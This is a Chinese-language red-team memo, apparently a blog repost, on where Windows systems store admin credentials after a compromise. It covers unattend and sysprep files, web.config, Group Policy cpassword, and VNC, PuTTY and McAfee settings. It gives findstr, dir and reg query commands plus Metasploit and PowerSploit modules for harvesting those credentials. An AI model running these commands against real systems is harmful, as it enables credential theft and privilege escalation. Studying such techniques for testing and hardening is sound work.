红队备忘录 – Windows凭证获取

当攻击者设法获得对系统的访问权限后，他的首要任务就是搜索整个系统，以发现本地管理员帐户的凭据，这将使他能够完全获得系统的控制权。当然，这是Windows系统中提升特权的最简单方法，本文的目的是研究这些凭据可能存在的一些常见位置，以帮助完成此过程。

Windows 文件
管理员通常使用Windows部署服务来创建Windows操作系统的映像并通过网络将该映像部署到各种系统中。这称为无人参与安装。无人参与安装的问题在于，本地管理员密码以明文形式或以Base-64编码形式存储在各个位置。这些位置是：

C:/unattend.xml C:/Windows/Panther/Unattend.xml 
C:/Windows/Panther/Unattend/Unattend.xml 
C:/Windows/system32/sysprep.inf 
C:/Windows/system32/sysprep/sysprep.xml

有一个Metasploit模块可以通过无人参与的安装来发现凭证：

post/windows/gather/enum_unattend

如果系统运行的是IIS服务器，则应检查web.config文件，因为它可能包含明文形式的管理员密码。该文件的位置通常在以下目录中：

C:/Windows/Microsoft.NET/Framework64/v4.0.30319/Config/web.config 
C:/inetpub/wwwroot/web.config

带有管理员凭据的web.config文件的示例如下所示：

<?xml version="1.0" encoding="UTF-8"?> <configuration> <system.web> <authentication mode="Windows"> <forms> <credentials passwordFormat="Clear"> <user name="Admin" password="Admin" /> </credentials> </forms> </authentication> </system.web> </configuration>

还可以通过组策略检索本地管理员密码。包含密码的Groups.xml文件在本地缓存，或者可以从域控制器获取，因为每个域用户都对该文件具有读取权限。密码采用加密形式，但是Microsoft已发布了密钥，可以对其进行解密。

C:/ProgramData/Microsoft/Group Policy/History/????/Machine/Preferences/Groups/Groups.xml //????/SYSVOL//Policies/????/MACHINE/Preferences/Groups/Groups.xml

除Group.xml文件外，cpassword属性还可以在其他策略首选项文件中找到，例如：

Services/Services.xml ScheduledTasks/ScheduledTasks.xml Printers/Printers.xml Drives/Drives.xml DataSources/DataSources.xml

Commands
除了手动浏览系统中的所有文件，还可以运行以下命令来发现包含单词password的文件：

findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini

另外，从C盘执行以下命令将返回可能存储提升凭据的文件的位置：

C:/> dir /b /s unattend.xml C:/> dir /b /s web.config C:/> dir /b /s sysprep.inf C:/> dir /b /s sysprep.xml C:/> dir /b /s *pass* C:/> dir /b /s vnc.ini

第三方软件
McAfee
运行McAfee的大多数Windows系统密码都以加密方式存储在SiteList.xml文件中：

%AllUsersProfile%Application Data/McAfee/Common Framework/SiteList.xml

VNC
有时候，管理员比较喜欢使用VNC软件而不是Windows Terminal Services来进行系统的远程管理。密码已加密，但是有各种工具可以对其进行解密。

UltraVNC

passwd=5FAEBBD0EF0A2413

RealVNC
在RealVNC中，哈希密码位于以下注册表项中：

reg query HKEY_LOCAL_MACHINE/SOFTWARE/RealVNC/WinVNC4 /v password

Putty明文代理凭据可在以下目录中找到：

reg query" HKCU/Software/SimonTatham/PuTTY/Sessions"

Registry
可以查询注册表，因为在某些情况下可能包含凭据

reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s

Windows自动登录：

reg query "HKLM/SOFTWARE/Microsoft/Windows NT/Currentversion/Winlogon"

SNMP参数：

reg query "HKLM/SYSTEM/Current/ControlSet/Services/SNMP"

PowerSploit
PowerSploit工具可以用来发现存储的凭证。它支持以下模块，这些模块将检查各种文件和注册表中的加密凭据或纯文本凭据：

Get-UnattendedInstallFile Get-Webconfig Get-ApplicationHost Get-SiteListPassword Get-CachedGPPPassword Get-RegistryAutoLogon

http://www.oniont.cn/index.php/archives/292.html

免责声明：本站某些文章、信息、图片、软件等来源于互联网，由本网整理发表，希望传递更多信息和学习之目的，并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题，请立即联系管理员，我们会给予更改或删除相关文章，保证您的权利。